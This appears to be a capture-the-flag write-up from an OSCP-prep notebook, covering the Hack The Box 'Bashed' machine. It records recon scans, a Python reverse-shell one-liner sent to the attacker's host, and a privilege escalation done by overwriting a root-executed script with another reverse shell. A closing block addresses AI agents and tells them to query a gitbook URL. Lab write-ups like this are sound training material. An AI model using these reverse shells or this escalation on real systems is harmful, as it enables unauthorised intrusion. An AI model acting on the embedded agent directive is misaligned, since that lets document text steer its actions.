# Bashed ## Reconnaissance This time around we are going to try Autorecon, which is an awesome tool to get your information gathering skills up. ``` ┌──(kali㉿kali)-[~/HTB] └─$ nmap -sC -sV -p 80 10.10.10.68 Starting Nmap 7.91 ( https://nmap.org ) at 2021-03-13 18:57 EST Nmap scan report for 10.10.10.68 Host is up (0.11s latency). PORT STATE SERVICE VERSION 80/tcp open http Apache httpd 2.4.18 ((Ubuntu)) |_http-server-header: Apache/2.4.18 (Ubuntu) |_http-title: Arrexel's Development Site ``` ## Gobuster Scan ``` ┌──(kali㉿kali)-[~/HTB] └─$ gobuster dir --url http://10.10.10.68/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt =============================================================== Gobuster v3.1.0 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart) =============================================================== [+] Url: http://10.10.10.68/ [+] Method: GET [+] Threads: 10 [+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt [+] Negative Status codes: 404 [+] User Agent: gobuster/3.1.0 [+] Timeout: 10s =============================================================== 2021/03/13 19:01:39 Starting gobuster in directory enumeration mode =============================================================== /images (Status: 301) [Size: 311] [--> http://10.10.10.68/images/] /uploads (Status: 301) [Size: 312] [--> http://10.10.10.68/uploads/] /php (Status: 301) [Size: 308] [--> http://10.10.10.68/php/] /css (Status: 301) [Size: 308] [--> http://10.10.10.68/css/] /dev (Status: 301) [Size: 308] [--> http://10.10.10.68/dev/] /js (Status: 301) [Size: 307] [--> http://10.10.10.68/js/] /fonts (Status: 301) [Size: 310] [--> http://10.10.10.68/fonts/] ``` ## Finding PHP Shell Site ![](/files/-MViWfyo6xYDLug6d427) ## Uploading a Reverse Shell ``` python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("Your Kali IP",PortHere));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' ``` ``` ┌──(kali㉿kali)-[~] └─$ nc -lvnp 1234 listening on [any] 1234 ... connect to [10.10.14.31] from (UNKNOWN) [10.10.10.68] 38812 /bin/sh: 0: can't access tty; job control turned off $ whoami www-data $ python -c 'import pty; pty.spawn("/bin/bash");' www-data@bashed:/var/www/html/dev$ whoami whoami www-data www-data@bashed:/var/www/html/dev$ sudo -l sudo -l Matching Defaults entries for www-data on bashed: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin User www-data may run the following commands on bashed: (scriptmanager : scriptmanager) NOPASSWD: ALL ``` ## Becoming Script Manager ``` www-data@bashed:/var/www/html/dev$ sudo -u scriptmanager ls sudo -u scriptmanager ls phpbash.min.php phpbash.php www-data@bashed:/var/www/html/dev$ sudo -u scriptmanager whoami sudo -u scriptmanager whoami scriptmanager www-data@bashed:/var/www/html/dev$ sudo -u scriptmanager bash sudo -u scriptmanager bash scriptmanager@bashed:/var/www/html/dev$ sudo -l ``` ## Escalating Privilege ``` scriptmanager@bashed:/scripts$ cat test.txt cat test.txt testing 123! scriptmanager@bashed:/scripts$ cat test.py cat test.py f = open("test.txt", "w") f.write("testing 123!") f.close scriptmanager@bashed:/scripts$ ls -l ls -l total 8 -rw-r--r-- 1 scriptmanager scriptmanager 58 Dec 4 2017 test.py -rw-r--r-- 1 root root 12 Mar 13 16:24 test ``` ### Changing File ``` scriptmanager@bashed:/scripts$ mv test.py baktest.py mv test.py baktest.py scriptmanager@bashed:/scripts$ ls ls baktest.py test.txt scriptmanager@bashed:/scripts$ touch test.py touch test.py scriptmanager@bashed:/scripts$ echo 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.31",7777));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' > test.py test.py scriptmanager@bashed:/scripts$ cat test.py cat test.py import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.31",7777));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]); ``` ## Obtaining Root ``` ┌──(kali㉿kali)-[~] └─$ nc -lvnp 7777 listening on [any] 7777 ... connect to [10.10.14.31] from (UNKNOWN) [10.10.10.68] 45928 /bin/sh: 0: can't access tty; job control turned off # whoami root # python -c 'import pty; pty.spawn("/bin/bash");' root@bashed:/scripts# ls ``` ## --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://manuelvazquez-contact.gitbook.io/oscp-prep/hack-the-box/bashed.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.